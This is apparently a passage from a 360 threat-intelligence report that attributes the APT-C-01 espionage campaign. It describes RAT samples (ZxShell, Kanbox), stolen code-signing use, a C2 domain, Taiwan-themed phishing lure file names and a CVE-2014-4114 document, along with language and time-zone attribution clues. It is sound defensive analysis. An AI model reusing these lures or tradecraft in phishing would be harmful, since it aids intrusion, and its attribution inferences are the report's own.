Figure 53 unknown RAT2011 (upper left), zxshell (upper right), Kanbox (below). The Kanbox version calls GetClientRect through a dynamically resolved API.

H. Legal digital signature

Versions before 2011

2015 BLOG version: started using the signature in May 2015 (suspected of being stolen). Signature: We Build Toolbars LLC

Chapter 4 The Group Behind the Curtain

1. Resource information of files and PE files.

  1. Vulnerability files:
     a. Normally released DOC: Traditional Chinese or region-specific fonts, etc.
     b. Some patches, such as DANK in PPSX
  2. PE: strings in Traditional Chinese or fonts used in a specific area (BIG5), such as PE file version information and the strings in ID/password/mutex.
  3. CC:
     a. Non-dynamic domain: Wade-Giles romanization, registration information
     b. Dynamic domain
     c. Cloud storage
  4. IP: a specific area and the United States, mainly in CC and mail.
  5. Related time zone: PE timestamps, file creation times, and information such as Monday-morning attacks.

2. Related information

1) Domain whois information

The domain is javainfo.upgrinfo.com. The address in the registration information is a specific area, and the spell of the name is Wade-Giles Romanization.

2) Keywords

Figure 54 Code containing related keywords

Keywords: “对台”, “台”, “台湾”

Lure file names (original file names of the vulnerability files or Trojans):

  • 2012年度涉台法学研究课题材料.doc

  • 2012年度涉台周边问题研究课题材料.doc

  • 2013年度涉台周边问题研究课题材料.doc

  • 关于海峡两岸关系法学研究会2012年年会暨会员大会的通报.doc

  • 关于两岸关系研究学术座谈会的背景材料.doc

  • 海峡两岸关系研究会2013年度涉台周边问题研究征集选题.zip

  • 海峡论坛深层次推动两岸关系.exe

  • 两岸军事互信研究学术研讨会议邀请信.doc

  • 台盟中央参政议政工作通讯2013年第2期.doc

3) Traditional fonts and BIG5 character set in the PE files

The help information in ZxShell appears garbled; it is actually traditional Chinese.

Figure 55 ZxShell related screenshot

Figure 56 unknown RAT 2009

4) Traditional Chinese fonts in the vulnerability document

Figure 57 Property details of the vulnerability file (CVE-2014-4114)

Figure 58 Slide from the vulnerability file (CVE-2014-4114)

5) Released phishing document

Default font for the specific region: PMingLiU

Figure 59 Phishing file released by the backdoor

Figure 60 Screenshot of the related Xinhua news

http://news.xinhuanet.com/world/2014-05/18/c_1110741502.htm

Chapter 5 Group Summary

Appendix 1: MD5


Appendix 2: C&C


Article link: http://blogs.360.cn/post/APT_C_01_en.html
